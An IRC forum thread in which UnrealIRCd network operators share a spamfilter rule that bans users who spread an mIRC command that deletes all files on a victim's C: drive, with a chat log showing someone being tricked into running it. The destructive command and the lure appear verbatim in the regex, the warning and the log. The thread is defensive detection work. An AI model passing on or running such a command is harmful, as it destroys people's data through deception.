UnrealIRCd Forums

Hey, I suggest EVERYONE adds this to their spamfilter.conf file. it is dangerous this expliot! LAME script kiddies heh?

Please. this is probably vital to any network owner.

here is the code:

spamfilter {
regex "//echo \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
target private;
action gline;
reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};
^^

you can change the reason to what you want. but please issue alerts to users NOT to type any unkown commands AND NOT TO TYPE

//echo -q $findfile(C:\,*,0,.remove $shortfn($1-))

Thanks.

P.S thanks to stealth for helping getting the spamfilter regex to work

hey, sorry guys, slight bug in that:

The correct code is;

spamfilter {
regex "//echo (-q)? \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)";
target private;
action gline;
reason "Hard drive swipe expliot command has been blocked. You will NOT be Unglined, Sorry - permanent ban.";
};

Have you seen this in the wild? Got some logs perhaps? ;)
Or mail it personally to me if you don't want to say it here (syzop at unrealircd etc)

yes, i have. I'm getting a friend to post his logs etc of what happened .
also some other people deleted their logs -_-

only trouble is, it isnt a bot, it's real people who do it...

Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.

[17:42:16pm] 4[Triforce4] Hey
[17:42:19pm] 4[Triforce4] Type this.. //echo -q $findfile(C:\,*,0,.remove $shortfn($1-)) and you will become an oper
[17:42:59pm]   414«4« quit 4speedtiger [mishy_@client-[safe]-B1A4728A.twcny.rr.com] ( Connection reset by peer ) 4
[17:43:12pm] 4[Karson4]0 Dont do it.
[17:43:15pm] 4[Triforce4] rofl lmao thats fucking great
===================================
his rejoin

[01:28:55am]   3(..join..) speedtiger (~mishy_@client-[safe]-B1A4728A.twcny.rr.com) [Unknown]
[01:30:15am] 4[speedtiger4] That thing i did earlier deleted all my files and we had to reinstall windows

aquanight wrote:Oh, I should point out that spamfilter glines are NOT permanent by default (IIRC). You might have to add ban-time 0 to make it perm.

ohh thanks; so i'd add:

action gline 0; or action gline ban-time 0;

?

Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
[blabla]
ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d :).

Or use a simple short ban time. Then find out how much of the IP is dynamic (ie identify the static parts of the hostname) and perm gline that .

That's a nasty thing.

Ow.

Ouch, this looks nasty. Any chance of getting this in spamfilter.conf if it's not in already?

Syzop wrote:Ok, thanks for the logs ;p.

And ehm.. to make the glines permanent, use:
spamfilter {
[blabla]
ban-time 0;
};

If you wonder why they aren't permanent by default, well.. there are various reasons for that. One of them is that many people have a dynamic ip, thus banning IPs "forever" can easily ban innocent users over time ;p. If you really find them scary, why not choose a long-but-not-infinite time, like.. 7d or 14d .

thanks for that

is there a way to make it gline users that say it via channel AND private?

of course there is.
Read the Documentation!

http://www.vulnscan.org/UnrealIRCd/unre ... spamfilter
http://www.vulnscan.org/UnrealIRCd/unre ... spamfilter